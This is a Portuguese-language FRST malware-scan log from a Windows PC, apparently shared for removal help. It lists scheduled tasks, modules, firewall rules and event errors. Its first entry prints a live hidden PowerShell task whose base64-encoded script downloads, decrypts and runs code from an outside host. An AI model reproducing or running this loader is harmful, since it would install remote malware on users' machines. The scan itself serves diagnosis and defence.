Task: {E98587F0-7FC2-42F6-87B7-F1AA099A6FBD} - System32\Tasks\{0A0D0847-0D0C-040D-0D11-7E050504117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGUAYQBzAHkAcABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGIAagA1AG8ARwBxAFMAYwBFAF8ARQBfAGYAdABIAHUAZQBjAGYAXwA1AHAAWQBEADgANgB5AFcAZwBxAEgAaAB5AGIAZgBnADQAWAAtAFoAaQA4AGoAVQB4AGgAbwA3ADIARAA5AHAALQBWAGoAdABSAFEANwBPAGIAdQA4AEYAQgBFAG0ARQBkAFUAWQB3AFcAWABIADEAcQBzAEgAcgBtAGkANwBvAGYAdABjAEwAeAAwADIANABYAHAARQBqADcAcwBYAFoAbABpAFkALQBHAG8AWgByAFkAUgAzAFcAaQA0AEQAOQBJAHgAcgBxADEARwB6AE0AQgBsAHcAUwBBAGYAWABCAFIANQB2AE8AbQBnAHQAUQBBADgAZQBZADQAWABnAFoAdgBiAEYATwBPADgANAAxAGUAUAB5AGoAZwBmAEYAMQA5AHEASwBuAG4ANwBRAEwAdwB0ADQAVABnADkAdwBUADQAbQBNAFgAUwBlAEsAVwBHADYAQQBkAGEAOQA1AEwAcgBpAG8AZQAwAGEAUQBqAFMAYgB5AHAANABLAEkAcwBlADkAYgBaADMAbABBADgAOQBvADAAagBtAEEATAAxAE4ANAA3AHIAcABYAEoAVABhAFoAVwBfAGgAagBOAHIAbgBuAHIASAA1AGsAZgBlAFEARwB3AFAARAB4AHkARABPAHUAbwBkAFQARgBIAEQASAB6AEYAdQByAGwANAAxAEYATQBRAGwAOQBGADYATgBTAEcASAB1ADYAMAAyAHgAawBRAHYAcgBGAGcAbgBRADkAZABCAG0AbABnAFIAUwBLAEUATQBJAFAATwBLAG8AXwBkAEsASgBTAG0AcQBRAGYAdgBXAGUAOAAwAG4AOQBEAEEAZQBJAEEAbwBnAFEAUQBNAFMAXwBBAGgAMQBWAGMATAAyAE4AQQBiAGYAcABKAFQAZAB0AHgAbgAzAHgAMQBBAEMARQBRAHUATQBOAGgAbABIAHoAQgBYADAAcwBxAE0AUABNADEAXwBLAE8ANgAzAEwAMgBzADcAVwA5AHAAQgB4ADYASgBZAG4AdQA0ADMAQgB0AHYAUAB0ADIAaQBqAEQAMwBWADAAcQBMAHgAZwAzADgAQQA5AGEASgA0AEcAZgBPAHQAOQBYAGMARABDAGMAYgBhAHUAUABEAEgANAB0AHcAZgAyAGcAagBoAFAAQwA4AHEAVgBpAHAAMQBYAGwAWgBiAG0AaQBxAFUAMgB5AHAAcwBrAG0AaQA1AEMAYwBVAEcAZwBzAFgAOQA4AFgATwBNAFoAOQA3AGMAUgBuAEUAZgA0AGUAagBWAEUAWQBUAE4AMgB4AGoAVAAzAFYANABSADYANwAwADEATAAyAEoAaABFAEMAZQBVAGMARgB0ADgAUABFAE0AdwBDAGMAWgAyAEUAbwBGAHIASQB1AFQAcwBVAC0ARAAzAHMAdQBKAEYAUwA3AHoANwA3AEgAdgBrAG0ARQA3AEEAVQBGADMARwBPADkAOABTAFEAYgBnAGcAMwBQAEsATwBLAEsAMwBNAEIATwBJAGcAaAAwADYAbgBKAEwAYwAtAFQAcgBTAG4AVgBiAF8AeAB3AGoAZAB4AGgANQA5AG8AUABaAEUAZwBpAGEAZQB6AEEAcwBDAGwAVgB1AFAAYQBMAF8ATABpADgAQwBfAHIANQAyAFMAagBfAFgARAA0ADkAUwAxAFMAMwBwAGMAZABOAFIAbgBTAFkAOQBRAG8ANgBsAEwAQQAtAHUAUABQAEsAdgBDAGkAdgBGAEgAXwBwAEUAOQA5AFYAcAB5AE4AQgBoAFQAegBNAFYASAByAEUANwA0ADYAYwBZAGgAVQB5AGcAaAByAGcAbgBOAHUAbQBSAEcAOQBiAHYAeQBxAEoAMwBJAGsAQwBMAHcAZQBDAFAAZQBFAGkAYwBlAFoARwBNAGMAbgBMAGEARwAwAEgAOABqAF8AegB2AEMAVwBtAHQAOQBDAFAAegB2AEQARQA2ADYASwBDAGEASwBjAHEAcwA5AFUASwBhAEcASgBJAGQAYQBmAFQAdwBDAGYAXwBzAHAAcABzAHUAUwAxAHIAQQA4AEkAbABwAHQAMwBDADAAOABPAGoAMAB6AG4AcgB1AEgAaQAtAFkAWABVAGYAOQBLAE4AdABTAEgAVABWAEgATQBHAE4AbwBLAFkAWABhADkAWABJAFAAMABTADEASwAwAHAAdQBRAG8ATQBZAHcAdAAwADkAXwBFADIAdABQAF8AZgBvAG8AdABCAFYANwByADYATwBnAEsAVgBKAEMAYgBuAGYANwBsAFUAcABuAGIAOABtAEQAXwBhAFQATgB6ADYAOQBwAFgATABSAHoAJgBjAD0AcQB3AFYARABIADUASQA1AHEASQBaAG8ASwBwAHUAVgBDAGEAeQBTAGcAUAAtAFcATABIAEoAMgBCADUAVABsADcAZgB0AEwAVQBzAFUAOQBiAHAAcgBKAE4AZABFAEEAeQB1AG8ASQB3AG0AeABFAFEATQBwAGcAVgBOAE0AQwBMAGIAZgBsADgAOQBsAEwAbAAwAGsANQBKADEAeABXAFIAMwB6AFcAcAA2AHEASwBKAGMANABBAC0ASgBYAGQAWgBxAF8ASABSAE8AMwBjAGsASgBVAEQAagA1ADgALQBYAGEAegB2AG4ASwBEAEcAVABVADcAbQBCAE8ARABNAHkANgA2ADMAMwBnAHMARgBQAC0AaABQAEwAUAA0AHUASABVADEAagBWAFIAVwBGAHcAcABfAC0ARABDAGwAMgBYAF8AYgBNAE4AUQBSAEgAUgBtAEUAegBwAE0AcABBADMATgAwAHQAegBpAEYAMwBXADgAUQB2ADIAXwBrADMAQwB3AEEANgBFAGMAdQBnADEASgAwAHMATgBhAF8AZABFAGEAVABkAFcAcAA1AGEAZQBTAEIAawBBAFIAZABPAEUAQQBJAFYAbQBiADcAdgBOADAAWABhAHAARwBQAGkAQgByAHcAWABHAHkAYwBjAEQASAA4AGsAawB4AHEARgBsAEsAcABWAFoAdABBADkAaQB2AEcAUAB1AEUAUwB3AHAAbQBWAEIAMABEAHAAbgBNAGoARgBuAHQAYwB3AEIAUQBiADMAcQByAEkANgBSAF8AMQBaAHEARQBWAHQAagBDAFUAMwBxAEgAWQBDAGEAdABrAGEAUABmAGcAegA2AGkASwBYAGgANQBTADEAeQA4AFoANABMAEsAbQB0AEYAdQBfAHkAZgA2AGEAbwBKAGIATwBIAGMALQAtAFgAZgBRADAALQBiAEIAawA2AGUARgBnAGYAUgA4AC0AcABCAFcAcgBOAEYAbwBuAEwAVQA4AC0AQQBYAGcAVwB2AEUAQQBGAEEARAB2AGEASQBfAGYAOABHAG8ANwBOAG0AYQBfAE0AeABTADAANABUADEAVQBoAFYAcABoAHEAQwBYAHIAVABoAFAAdwBuAGcAMQA5AEIAUgBpAE8AVABEAFUATAAtAGMAZwBmAHQAWABiAFEAdQBrAEMANAAyAFQAdABQAGcAbwBCAHgARgBnAEkAcQBKAFcAQgBMAGEANwBRADAANQA2AHcAbABsAFAAMABDAGoAUABfAGUAagBPAEsAUwAzAFgAZgBCAE0AZQBtAGwASABLAF8AcQA4AG8AQwBBAF8AUQBtAHAAVgBsAHUAWgBHAGwANQBoAGwAZgBhADYAdABzAEIAcQBwAFoAZQAzAFEAWABGAE0AZgBDADAAWQBzAHcAaAAzAHkAdQBYAGcAdwB3AGIAWAA1AHkAOABRAEIAaQBKAFMASAB1ADcARgBDAF8ARgBXAFgATwBNAEcAYwBaAGgAXwBWAGIAbQBlAHYAbABtAHAAeQBMAGgAcQBMAHIASwBHADIAawBvAFUARABZAEEAcQBxAGoAbwBrAGsAeQBxAGQAVwBMAEQANQBQAEgAUQB4AEQAWQBZAEEAXwBDADkAWQBLADQAawBGAEYAQQBwAGkAZwAwAHgAOQBlAE0AWQB6AFcARQBSAGkAZgA2AHYAegBQAEgAVwB4AFQAMQBUAFUAeABUAHgAXwBvADUAbwBuAFAAdwBYAEsAegB5AHQAYQB1AHoASgBIADUANwBhAEQAQgB3ADEAMgA0AFEATgBvAG0AdgAwAEMAYgBBAHcAagBtAGkAUgBUAFAARAB2AHkAdABwAFEAbQB2AHYATAAwAE8ARgBZAHgAWgBPADkAVQA3AHMATgBYAEYAZwBRAEYAOQA5AFgAXwAxAG4ASwBUAFQAcgBDAHYAbABnAG4ARwA0AHYAVwBJAGMAVABNAFIATgBQAFAAeAA2AHEASwB6ADIAcgBZAFMATwB0AHIANgB4AFIAVAAxAFQAbAB3AEEAWgB5AHkAbQB0AHYAdwByADUAYgA2AHUAYQB3ADIASwBCAHgAYQBlADIATgBmADMASQBrAGUARwA1AEUAQwB0AHcAegBIAFoAdAB5AHUAWQA1AFgAVABpAGYAcABBAHAAawBrAEcAVwBEADcAcgA4AGEAMQB2AG4AQwBOAEsAMgBGADEAegB0ADUAeABBAGIARwBYADQAagBTADMAXwBDAFoASgByADcAZAAzAGQAWgBKAEEAWgBlAHUAbwBWAFkARwBXADEATgB4AEgATwBiAHIAdQBnADIAeQBpADcAWABhAC0AdgBpAEYAdQBEAEUARQBUAFUATABlAFYANABsAGwAcQBKAEgARgBGAE4AbABFAE8AbwByADIAOABhAFEAUwAxAFgAZwBKAFAAbAAmAHIAPQA1ADIAMAA1ADMAOAAxADQAMQA2ADIANgAwADAAOAA4ADYAMgA4ACIAOwAkAHMAdABzAGsAPQAiAHsAMABBADAARAAwADgANAA3AC0AMABEADAAQwAtADAANAAwAEQALQAwAEQAMQAxAC0ANwBFADAANQAwADUAMAA0ADEAMQA3AEUAfQAiADsAJABwAHIAaQBkAD0AIgBTAHkAcwB0AGUAbQBIAGUAYQBsAGUAcgAiADsAJABpAG4AaQBkAD0AIgBLAEMASgBMAEcARgBPAFEAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {ED7BCE54-A07B-40AE-9F09-D081442317AE} - System32\Tasks\{5650ECF4-34A2-4B5C-96F0-983F75C5EB1B} => pcalua.exe -a "C:\Program Files (x86)\MTV20151125\uninstall.exe" -d "C:\Program Files (x86)\MTV20151125"
Task: {EDC8D0BB-3E01-4D79-9B4A-0414B5867F44} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {F38DAB9F-41B6-451F-99DF-4464F63DABBC} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {F40314A8-999F-4BC8-A2CF-A070F9F550A7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {F4AC9811-AEA6-462D-A335-93A76593E03A} - \PFExe -> Nenhum Arquivo <==== ATENÇÃO
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\{2A6A6C0A-6DF1-4478-807F-2FF9BF46B935}.job => C:\Users\Marcio\AppData\Roaming\{2F3AA0F6-976C-4b02-A66A-5D1DEA00811F}\InstallHelp.exe-RunCheckUpdate C:\Users\Marcio\AppData\Roaming\{2F3AA0F6-976C-4b02-A66A-5D1DEA00811F}\CheckUpdate.exe <==== ATENÇÃO
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
==================== Módulos Carregados (Whitelisted) ==============
2015-09-10 02:07 - 2015-09-10 02:07 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-10 02:08 - 2015-09-10 02:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-09-23 17:41 - 2015-09-23 17:41 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2015-11-08 10:05 - 2015-11-08 10:05 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-11-08 10:05 - 2015-11-08 10:05 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2015-10-09 10:22 - 2015-12-08 00:57 - 00169408 _____ () C:\Program Files (x86)\Garena Plus\ggdllhost.exe
2015-11-08 10:06 - 2015-11-08 10:06 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2012-11-26 23:54 - 2012-11-26 23:54 - 00094208 _____ () C:\WINDOWS\System32\IccLibDll_x64.dll
2016-01-14 22:16 - 2016-01-14 06:46 - 02412032 _____ () C:\Users\Marcio\AppData\Roaming\msiql.exe
2016-01-16 19:36 - 2016-01-16 18:42 - 01905664 _____ () C:\ProgramData\WindowsMsg\osmsg.exe
2014-11-13 17:31 - 2014-11-13 17:31 - 00057344 _____ () C:\Program Files\CCleaner\lang\lang-1046.dll
2016-01-09 22:13 - 2016-01-09 22:13 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2015-12-12 07:16 - 2015-11-25 01:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-12 07:16 - 2015-11-25 01:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-12 07:16 - 2015-11-25 01:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-11-08 10:05 - 2015-11-08 10:05 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 00:13 - 2015-09-10 02:07 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2014-04-07 11:31 - 2014-04-07 11:31 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll
2015-10-09 10:23 - 2015-12-08 00:57 - 02535872 _____ () C:\Program Files (x86)\Garena Plus\ggspawn.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2016-01-14 23:27 - 2016-01-12 13:35 - 01590088 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.111\libglesv2.dll
2016-01-14 23:27 - 2016-01-12 13:35 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.111\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
AlternateDataStreams: C:\Users\Todos os Usuários\TEMP:DFC5A2B2
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-13 23:34 - 2016-01-16 20:00 - 00000753 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Marcio\Desktop\Marcio\Imagens\2.png
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run32: => "LightGate"
HKLM\...\StartupApproved\Run32: => "MTview"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\StartupApproved\Run: => "GarenaPlus"
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\StartupApproved\Run: => "lsas"
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [TCP Query User{FB2C75CB-A22C-4978-A353-6795F7DB3D8A}C:\users\marcio\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{74DDAC89-5B08-491D-AA65-77DE1F1DA603}C:\users\marcio\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [{25A1706F-ADDD-4C53-ABF8-97EE159EF6DF}] => (Block) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [{2611ECB4-6187-43FA-9CB3-C91F48FFE2AA}] => (Block) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{7241B169-8C89-44F0-9B47-EE16E6034EF3}C:\users\marcio\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\marcio\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{E617D7D1-FF28-4D53-81B3-618A00F48BA7}C:\users\marcio\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\marcio\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{A5983147-5176-41E6-8E42-CFD6A5CD3D88}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{EBD491B5-5F62-46FD-AF92-B4B6A1A9FFE7}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
==================== Pontos de Restauração =========================
16-01-2016 18:03:49 Ponto de Verificação Agendado
16-01-2016 21:22:59 Backup do Windows
16-01-2016 21:35:18 Backup do Windows
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (01/16/2016 09:35:44 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:28:45 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:28:00 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:23:21 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:09:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ElanTPCfg64.exe, versão: 1.0.65.1, carimbo de data/hora: 0x4f0be108
Nome do módulo com falha: ETDApi.dll, versão: 11.9.0.0, carimbo de data/hora: 0x5448e4ce
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000008f72
ID do processo com falha: 0xe5c
Hora de início do aplicativo com falha: 0xElanTPCfg64.exe0
Caminho do aplicativo com falha: ElanTPCfg64.exe1
Caminho do módulo com falha: ElanTPCfg64.exe2
ID do Relatório: ElanTPCfg64.exe3
Nome completo do pacote com falha: ElanTPCfg64.exe4
ID do aplicativo relativo ao pacote com falha: ElanTPCfg64.exe5
